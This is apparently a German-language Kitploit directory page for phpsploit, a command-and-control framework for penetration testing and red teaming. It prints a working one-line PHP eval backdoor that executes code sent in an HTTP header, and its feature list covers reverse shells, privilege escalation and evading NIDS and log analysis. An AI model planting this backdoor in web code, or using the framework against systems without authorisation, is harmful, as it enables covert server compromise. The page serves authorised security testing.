Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
phpsploit — Voll ausgestattetes C2-Framework, das mit einem einzeiligen PHP-Backdoor unbemerkt auf einem Webserver persistiert | Kitploit
Tools/GitHubGitHub/nil0x42/phpsploit
Penetrationstest-FrameworksPrivilege EscalationExploit-FrameworksPersistenzmechanismenWebanwendungs-ExploitationPost-ExploitationCommand and ControlRed TeamingPayload-Entwicklung
GitHubnil0x42/phpsploit

phpsploit

Voll ausgestattetes C2-Framework, das mit einem einzeiligen PHP-Backdoor unbemerkt auf einem Webserver persistiert

2.5k468vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Master

Voll ausgestattetes C2-Framework, das stillschweigend auf dem
Webserver persistiert mittels polymorphischem PHP-One-Liner tweet


Unit Tests workflow Dependabot status codacy code quality CodeQL workflow codecov coverage codeclimate maintainability

Erstellt von nil0x42 und Mitwirkenden


Übersicht

Die verschleierte Kommunikation erfolgt mittels HTTP-Headern unter normalen Client-Anfragen und den entsprechenden Antworten des Webservers, tunneln durch eine winzige polymorphe Hintertür:

root@kitploit:~
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Schnellstart

root@kitploit:~
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Funktionen

  • Effizient: Mehr als 20 Plugins zur Automatisierung von Privilege-Escalation-Aufgaben

    • Befehle ausführen und Dateisystem durchsuchen, PHP-Sicherheitsbeschränkungen umgehen
    • Dateien zwischen Client und Ziel hoch-/herunterladen
    • Entfernte Dateien über lokalen Texteditor bearbeiten
    • SQL-Konsole auf dem Zielsystem ausführen
    • Reverse-TCP-Shells erzeugen
  • Tarnung: Das Framework wurde von Paranoikern für Paranoiker entwickelt

    • Nahezu unsichtbar für Log-Analyse und NIDS-Signaturerkennung
    • Safe-Mode und übliche Umgehung von PHP-Sicherheitseinschränkungen
    • Kommunikation ist in HTTP-Headern versteckt
    • Geladene Payloads werden verschleiert, um NIDS zu umgehen
    • http/https/socks4/socks5 Proxy-Unterstützung
  • Bequemlichkeit: Eine robuste Oberfläche mit vielen wichtigen Funktionen

    • Detaillierte Hilfe für jede Option (help-Befehl)
    • Plattformübergreifend sowohl auf Client als auch Server.
    • CLI unterstützt Auto-Vervollständigung & Mehrfachbefehle
    • Sitzungs-Speicher-/Ladefunktion & beständiger Verlauf
    • Unterstützung für mehrere Anfragen bei großen Payloads (z.B. Uploads)
    • Bietet eine leistungsstarke, hochgradig konfigurierbare Einstellungs-Engine
    • Jede Einstellung, wie z.B. User-Agent, hat einen polymorphen Modus
    • Anpassbare Umgebungsvariablen für Plugin-Interaktion
    • Bietet eine vollständige Plugin-Entwicklungs-API

Unterstützte Plattformen (als Angreifer):

  • GNU/Linux
  • Mac OS X

Unterstützte Plattformen (als Ziel):

  • GNU/Linux
  • BSD-ähnlich
  • Mac OS X
  • Windows NT

Mitwirkende

Dank geht an diese wunderbaren Leute:

Dieses Projekt folgt der all-contributors-Spezifikation. Beiträge jeglicher Art sind willkommen.

Tool herunterladen

nil0x42

💻 🚇 🔌 ⚠️

shiney-wh

💻 🔌

Wannes Rombouts

💻 🚧

Amine Ben Asker

💻 🚧

jose nazario

📖 🐛

Sujit Ghosal

📝

Zerdoumi

🐛

tristandostaler

🐛

Rohan Tarai

🐛

Jonas Lejon

📝